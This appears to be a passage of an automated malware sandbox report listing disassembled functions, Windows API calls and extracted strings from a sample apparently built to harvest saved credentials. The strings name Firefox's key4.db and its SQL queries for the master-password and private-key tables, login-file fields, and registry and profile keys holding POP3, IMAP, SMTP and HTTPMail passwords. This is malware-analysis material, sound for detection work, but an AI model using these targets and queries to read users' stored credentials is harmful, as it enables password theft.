                                                            • Opcode ID: 39ded4ddef3cc4279da07cdcd0aea708266a9fb2ccc9a22b6ca55318489a3f76
                                                            • Instruction ID: a08a85c5be877f1b118c2cb4fdaf5607b5944e2b5e0e57495ee86e8d77b21b2f
                                                            • Opcode Fuzzy Hash: 39ded4ddef3cc4279da07cdcd0aea708266a9fb2ccc9a22b6ca55318489a3f76
                                                            • Instruction Fuzzy Hash: A9114F39501205EFE7506FB4EC8CB9E7BB8EF05315F144175F506E22A1DB3489158AA9
                                                            APIs
                                                            • EmptyClipboard.USER32 ref: 00406EA7
                                                            • strlen.MSVCRT ref: 00406EB4
                                                            • GlobalAlloc.KERNEL32(00002000,00000001,?,?,?,?,0040C360,?), ref: 00406EC3
                                                            • GlobalLock.KERNEL32(00000000), ref: 00406ED0
                                                            • memcpy.MSVCRT(00000000,?,00000001,?,?,?,?,0040C360,?), ref: 00406ED9
                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00406EE2
                                                            • SetClipboardData.USER32(00000001,00000000), ref: 00406EEB
                                                            • CloseClipboard.USER32 ref: 00406EFB
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpystrlen
                                                            • String ID:
                                                            • API String ID: 3116012682-0
                                                            • Opcode ID: cf45331a199c339a57bf15afb53481a6f1c327c5b86da421185a706dc513e21a
                                                            • Instruction ID: 469d781c3ef94e65abf7249e996c377109e97d6fa28bdd4c6fbc6e531372765c
                                                            • Opcode Fuzzy Hash: cf45331a199c339a57bf15afb53481a6f1c327c5b86da421185a706dc513e21a
                                                            • Instruction Fuzzy Hash: FFF0BB3F1002196BD2502FA5FC8CE5B776CDB85B56709413DF906D2252DE34980447F9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: PrivateProfileString_mbscmpstrlen
                                                            • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                                                            • API String ID: 3963849919-1658304561
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Similarity
                                                            • API ID: ??2@??3@memcpymemset
                                                            • String ID: (yE$(yE$(yE
                                                            • API String ID: 1865533344-362086290
                                                            APIs
                                                            • strlen.MSVCRT ref: 004431AD
                                                            • strncmp.MSVCRT ref: 004431BD
                                                            • memcpy.MSVCRT(?,00000002,00000000,?,?,?,?), ref: 00443239
                                                            • atoi.MSVCRT(00000000,?,00000002,00000000,?,?,?,?), ref: 0044324A
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000002,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00443276
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Similarity
                                                            • API ID: ByteCharMultiWideatoimemcpystrlenstrncmp
                                                            • String ID: AElig;$Aacute;$Acirc;$Agrave;$Aring;$Atilde;$Auml;$Ccedil;$ETH;$Eacute;$Ecirc;$Egrave;$Euml;$Iacute;$Icirc;$Igrave;$Iuml;$Ntilde;$Oacute;$Ocirc;$Ograve;$Oslash;$Otilde;$Ouml;$THORN;$Uacute;$Ucirc;$Ugrave;$Uuml;$Yacute;$aacute;$acirc;$acute;$aelig;$agrave;$amp;$apos;$aring;$atilde;$auml;$brvbar;$ccedil;$cedil;$cent;$copy;$curren;$deg;$divide;$eacute;$ecirc;$egrave;$eth;$euml;$frac12;$frac14;$frac34;$gt;$iacute;$icirc;$iexcl;$igrave;$iquest;$iuml;$laquo;$lt;$macr;$micro;$middot;$nbsp;$not;$ntilde;$oacute;$ocirc;$ograve;$ordf;$ordm;$oslash;$otilde;$ouml;$para;$plusmn;$pound;$quot;$raquo;$reg;$sect;$shy;$sup1;$sup2;$sup3;$szlig;$thorn;$times;$uacute;$ucirc;$ugrave;$uml;$uuml;$yacute;$yen;$yuml;
                                                            • API String ID: 1895597112-3210201812
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Similarity
                                                            • API ID: strcmp$_strcmpi$memcpystrlenstrtoul
                                                            • String ID: Account_Name$IMAP$IMAP_Port$IMAP_Secure_Connection$IMAP_Server$IMAP_User_Name$NNTP$NNTP_Email_Address$NNTP_Port$NNTP_Secure_Connection$NNTP_Server$NNTP_User_Name$POP3$POP3_Port$POP3_Secure_Connection$POP3_Server$POP3_User_Name$SMTP$SMTP_Email_Address$SMTP_Port$SMTP_Secure_Connection$SMTP_Server$SMTP_User_Name
                                                            • API String ID: 1714764973-479759155
                                                            APIs
                                                            • memset.MSVCRT ref: 0040EBD8
                                                              • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                                              • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                                              • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                                            • memset.MSVCRT ref: 0040EC2B
                                                            • memset.MSVCRT ref: 0040EC47
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,0040F26F,000000FF,?,00000104,?,?,?,?,?,?,0040F26F,?,00000000), ref: 0040EC5E
                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000104,00000000,00000000,?,?,?,?,?,?,0040F26F,?), ref: 0040EC7D
                                                            • memset.MSVCRT ref: 0040ECDD
                                                            • memset.MSVCRT ref: 0040ECF2
                                                            • _mbscpy.MSVCRT(?,00000000), ref: 0040ED59
                                                            • _mbscpy.MSVCRT(?,0040F26F), ref: 0040ED6F
                                                            • _mbscpy.MSVCRT(?,00000000), ref: 0040ED85
                                                            • _mbscpy.MSVCRT(?,?), ref: 0040ED9B
                                                            • _mbscpy.MSVCRT(?,?), ref: 0040EDB1
                                                            • _mbscpy.MSVCRT(?,?), ref: 0040EDC7
                                                            • memset.MSVCRT ref: 0040EDE1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Similarity
                                                            • API ID: memset$_mbscpy$ByteCharMultiWidestrlen
                                                            • String ID: $"$$$$$+$,$/$8$:$e$imap://%s$mailbox://%s$smtp://%s
                                                            • API String ID: 3137614212-1455797042
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Similarity
                                                            • API ID: _strcmpi$strlen$strncmp$atoimemcpy$memset
                                                            • String ID: fullname$hostname$identities$mail.account.account$mail.identity$mail.server$mail.smtpserver$port$server$signon.signonfilename$smtpserver$true$type$useSecAuth$useremail$username
                                                            • API String ID: 2814039832-2206097438
                                                            APIs
                                                              • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                                              • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                                              • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                                              • Part of subcall function 00408934: GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,0040F28D,?,00000000,?,?,?,?,?,?), ref: 00408952
                                                              • Part of subcall function 00408934: CloseHandle.KERNEL32(?,?), ref: 0040899C
                                                              • Part of subcall function 004089F2: _mbsicmp.MSVCRT ref: 00408A2C
                                                            • memset.MSVCRT ref: 0040E5B8
                                                            • memset.MSVCRT ref: 0040E5CD
                                                            • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E634
                                                            • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E64A
                                                            • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E660
                                                            • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E676
                                                            • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E68C
                                                            • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E69F
                                                            • memset.MSVCRT ref: 0040E6B5
                                                            • memset.MSVCRT ref: 0040E6CC
                                                              • Part of subcall function 004066A3: memset.MSVCRT ref: 004066C4
                                                              • Part of subcall function 004066A3: memcmp.MSVCRT(?,00456EA0,00000010,?,?,000000FF), ref: 004066EE
                                                            • memset.MSVCRT ref: 0040E736
                                                            • memset.MSVCRT ref: 0040E74F
                                                            • sprintf.MSVCRT ref: 0040E76D
                                                            • sprintf.MSVCRT ref: 0040E788
                                                            • _strcmpi.MSVCRT ref: 0040E79E
                                                            • _strcmpi.MSVCRT ref: 0040E7B7
                                                            • _strcmpi.MSVCRT ref: 0040E7D3
                                                            • memset.MSVCRT ref: 0040E858
                                                            • sprintf.MSVCRT ref: 0040E873
                                                            • _strcmpi.MSVCRT ref: 0040E889
                                                            • _strcmpi.MSVCRT ref: 0040E8A5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Similarity
                                                            • API ID: memset$_mbscpy$_strcmpi$sprintf$strlen$CloseFileHandleSize_mbsicmpmemcmp
                                                            • String ID: encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
                                                            • API String ID: 4171719235-3943159138
                                                            APIs
                                                            • GetDlgItem.USER32(?,000003E9), ref: 0041042E
                                                            • GetDlgItem.USER32(?,000003E8), ref: 0041043A
                                                            • GetWindowLongA.USER32(00000000,000000F0), ref: 00410449
                                                            • GetWindowLongA.USER32(?,000000F0), ref: 00410455
                                                            • GetWindowLongA.USER32(00000000,000000EC), ref: 0041045E
                                                            • GetWindowLongA.USER32(?,000000EC), ref: 0041046A
                                                            • GetWindowRect.USER32(00000000,?), ref: 0041047C
                                                            • GetWindowRect.USER32(?,?), ref: 00410487
                                                            • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041049B
                                                            • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004104A9
                                                            • GetDC.USER32 ref: 004104E2
                                                            • strlen.MSVCRT ref: 00410522
                                                            • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 00410533
                                                            • ReleaseDC.USER32(?,?), ref: 00410580
                                                            • sprintf.MSVCRT ref: 00410640
                                                            • SetWindowTextA.USER32(?,?), ref: 00410654
                                                            • SetWindowTextA.USER32(?,00000000), ref: 00410672
                                                            • GetDlgItem.USER32(?,00000001), ref: 004106A8
                                                            • GetWindowRect.USER32(00000000,?), ref: 004106B8
                                                            • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004106C6
                                                            • GetClientRect.USER32(?,?), ref: 004106DD
                                                            • GetWindowRect.USER32(?,?), ref: 004106E7
                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0041072D
                                                            • GetClientRect.USER32(?,?), ref: 00410737
                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0041076F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Similarity
                                                            • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                                                            • String ID: %s:$EDIT$STATIC
                                                            • API String ID: 1703216249-3046471546
                                                            APIs
                                                            • memset.MSVCRT ref: 004024F5
                                                              • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00410E73,?,?,?,?,00410E73,00000000,?,?), ref: 00410AF8
                                                            • _mbscpy.MSVCRT(?,00000000,?,?,?,76BAE430,?,00000000), ref: 00402533
                                                            • _mbscpy.MSVCRT(?,?), ref: 004025FD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Similarity
                                                            • API ID: _mbscpy$QueryValuememset
                                                            • String ID: HTTPMail$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$Password2$SMTP$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                                                            • API String ID: 168965057-606283353
                                                            APIs
                                                            • memset.MSVCRT ref: 00402869
                                                              • Part of subcall function 004029A2: RegQueryValueExA.ADVAPI32(00000400,?,00000000,?,?,?), ref: 004029D3
                                                            • _mbscpy.MSVCRT(?,?,76BAE430,?,00000000), ref: 004028A3
                                                              • Part of subcall function 004029A2: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00402A01
                                                            • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,76BAE430,?,00000000), ref: 0040297B
                                                              • Part of subcall function 00410AB6: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402936,?,?,?,?,00402936,?,?), ref: 00410AD5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Similarity
                                                            • API ID: QueryValue_mbscpy$ByteCharMultiWidememset
                                                            • String ID: Display Name$Email$HTTP$HTTP Port$HTTP Server URL$HTTP User$HTTPMail Use SSL$IMAP$IMAP Port$IMAP Server$IMAP Use SPA$IMAP User$POP3$POP3 Port$POP3 Server$POP3 Use SPA$POP3 User$Password$SMTP$SMTP Port$SMTP Server$SMTP Use SSL$SMTP User
                                                            • API String ID: 1497257669-167382505
                                                            APIs
                                                            • EndDialog.USER32(?,?), ref: 0040FC88
                                                            • GetDlgItem.USER32(?,000003EA), ref: 0040FCA0
                                                            • SendMessageA.USER32(00000000,000000B1,00000000,0000FFFF), ref: 0040FCBF
                                                            • SendMessageA.USER32(?,00000301,00000000,00000000), ref: 0040FCCC
                                                            • SendMessageA.USER32(?,000000B1,00000000,00000000), ref: 0040FCD5
                                                            • memset.MSVCRT ref: 0040FCFD
                                                            • memset.MSVCRT ref: 0040FD1D
                                                            • memset.MSVCRT ref: 0040FD3B
                                                            • memset.MSVCRT ref: 0040FD54
                                                            • memset.MSVCRT ref: 0040FD72
                                                            • memset.MSVCRT ref: 0040FD8B
                                                            • GetCurrentProcess.KERNEL32 ref: 0040FD93
                                                            • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0040FDB8
                                                            • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0040FDEE
                                                            • memset.MSVCRT ref: 0040FE45
                                                            • GetCurrentProcessId.KERNEL32 ref: 0040FE53
                                                            • memcpy.MSVCRT(?,00457E70,00000118), ref: 0040FE82
                                                            • _mbscpy.MSVCRT(?,00000000), ref: 0040FEA4
                                                            • sprintf.MSVCRT ref: 0040FF0F
                                                            • SetDlgItemTextA.USER32(?,000003EA,?), ref: 0040FF28
                                                            • GetDlgItem.USER32(?,000003EA), ref: 0040FF32
                                                            • SetFocus.USER32(00000000), ref: 0040FF39
                                                            Strings
                                                            • {Unknown}, xrefs: 0040FD02
                                                            • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s, xrefs: 0040FF09
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_mbscpymemcpysprintf
                                                            • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s${Unknown}
                                                            APIs
                                                            • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                                                            • GetDlgItem.USER32(?,000003EE), ref: 00401103
                                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                                                            • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                                                            • LoadCursorA.USER32(00000067), ref: 0040115F
                                                            • SetCursor.USER32(00000000,?,?), ref: 00401166
                                                            • GetDlgItem.USER32(?,000003EE), ref: 00401186
                                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                                                            • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                                                            • SetBkMode.GDI32(?,00000001), ref: 004011B9
                                                            • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                                                            • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                                                            • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                                                            • EndDialog.USER32(?,00000001), ref: 0040121A
                                                            • DeleteObject.GDI32(?), ref: 00401226
                                                            • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                                                            • ShowWindow.USER32(00000000), ref: 00401253
                                                            • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                                                            • ShowWindow.USER32(00000000), ref: 00401262
                                                            • SetDlgItemTextA.USER32(?,000003EE,0045A5E0), ref: 00401273
                                                            • memset.MSVCRT ref: 0040128E
                                                            • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                                                            • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                                                            • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                                                            • String ID:
                                                            APIs
                                                              • Part of subcall function 00409070: LoadMenuA.USER32(00000000), ref: 00409078
                                                              • Part of subcall function 00409070: sprintf.MSVCRT ref: 0040909B
                                                            • SetMenu.USER32(?,00000000), ref: 0040BD23
                                                            • SendMessageA.USER32(00000000,00000404,00000001,?), ref: 0040BD56
                                                            • LoadImageA.USER32(00000068,00000000,00000000,00000000,00009060), ref: 0040BD6C
                                                            • CreateWindowExA.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000), ref: 0040BDCC
                                                            • LoadIconA.USER32(00000066,00000000), ref: 0040BE3B
                                                            • _strcmpi.MSVCRT ref: 0040BE93
                                                            • RegDeleteKeyA.ADVAPI32(80000001,0044C52F), ref: 0040BEA8
                                                            • SetFocus.USER32(?,00000000), ref: 0040BECE
                                                            • GetFileAttributesA.KERNEL32(0045AB10), ref: 0040BEE7
                                                            • GetTempPathA.KERNEL32(00000104,0045AB10), ref: 0040BEF7
                                                            • strlen.MSVCRT ref: 0040BEFE
                                                            • strlen.MSVCRT ref: 0040BF0C
                                                            • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 0040BF68
                                                              • Part of subcall function 00404B87: strlen.MSVCRT ref: 00404BA4
                                                              • Part of subcall function 00404B87: SendMessageA.USER32(?,0000101B,?,?), ref: 00404BC8
                                                            • SendMessageA.USER32(?,00000404,00000002,?), ref: 0040BFB3
                                                            • SendMessageA.USER32(?,00000401,00001001,00000000), ref: 0040BFC6
                                                            • memset.MSVCRT ref: 0040BFDB
                                                            • SetWindowTextA.USER32(?,?), ref: 0040BFFF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Loadstrlen$MenuWindow$AttributesClipboardCreateDeleteFileFocusFormatIconImagePathRegisterTempText_strcmpimemsetsprintf
                                                            • String ID: /noloadsettings$SysListView32$commdlg_FindReplace$report.html
                                                            APIs
                                                            • memcmp.MSVCRT(?,file:,00000005,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 004425C8
                                                            • memcmp.MSVCRT(localhost,?,00000009,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 00442656
                                                            • memcmp.MSVCRT(vfs,00000001,00000000,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 00442800
                                                            • memcmp.MSVCRT(cache,00000001,00000005,00000000,00000000,BINARY), ref: 0044282C
                                                            • memcmp.MSVCRT(mode,00000001,00000004,00000000,00000000,BINARY), ref: 0044285E
                                                            • memcmp.MSVCRT(?,?,G+D,00000000,00000000,BINARY), ref: 004428A9
                                                            • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 0044293C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memcmp$memcpy
                                                            • String ID: %s mode not allowed: %s$,nE$@$BINARY$G+D$G+D$access$cache$file:$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s$vfs
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: _mbscat$memsetsprintf$_mbscpy
                                                            • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                            APIs
                                                            • memset.MSVCRT ref: 00406782
                                                              • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                              • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
                                                            • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,key4.db,00000143,00000000), ref: 0040685E
                                                            • memcmp.MSVCRT(00000000,00457934,00000006,?,?,?,?,?,?,?,?,key4.db,00000143,00000000), ref: 0040686E
                                                            • memcpy.MSVCRT(?,00000023,?,?,?,?,?,?,?,?,?,?,?,?,key4.db,00000143), ref: 004068A1
                                                            • memcpy.MSVCRT(?,?,00000010), ref: 004068BA
                                                            • memcpy.MSVCRT(?,?,00000010), ref: 004068D3
                                                            • memcmp.MSVCRT(00000000,0045793C,00000006,?,?,?,?,?,?,?,?,?,?,?,key4.db,00000143), ref: 004068EC
                                                            • memcpy.MSVCRT(?,00000015,?), ref: 00406908
                                                            • memcmp.MSVCRT(00000000,00456EA0,00000010,?,?,?,?,?,?,?,?,?,?,key4.db,00000143,00000000), ref: 004069B2
                                                            • memcmp.MSVCRT(00000000,00457944,00000006), ref: 004069CA
                                                            • memcpy.MSVCRT(?,00000023,?), ref: 00406A03
                                                            • memcpy.MSVCRT(?,00000042,00000010), ref: 00406A1F
                                                            • memcpy.MSVCRT(?,00000054,00000020), ref: 00406A3B
                                                            • memcmp.MSVCRT(00000000,0045794C,00000006), ref: 00406A4A
                                                            • memcpy.MSVCRT(?,00000015,?), ref: 00406A6E
                                                            • memcpy.MSVCRT(?,0000001A,00000020), ref: 00406A86
                                                            Strings
                                                            • SELECT item1,item2 FROM metadata WHERE id = 'password', xrefs: 004067C4
                                                            • SELECT a11,a102 FROM nssPrivate, xrefs: 00406933
                                                            • key4.db, xrefs: 00406756
                                                            • , xrefs: 00406834
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memcpy$memcmp$memsetstrlen
                                                            • String ID: $SELECT a11,a102 FROM nssPrivate$SELECT item1,item2 FROM metadata WHERE id = 'password'$key4.db
                                                            APIs
                                                            • memset.MSVCRT ref: 0040A973
                                                            • memset.MSVCRT ref: 0040A996
                                                            • memset.MSVCRT ref: 0040A9AC
                                                            • memset.MSVCRT ref: 0040A9BC
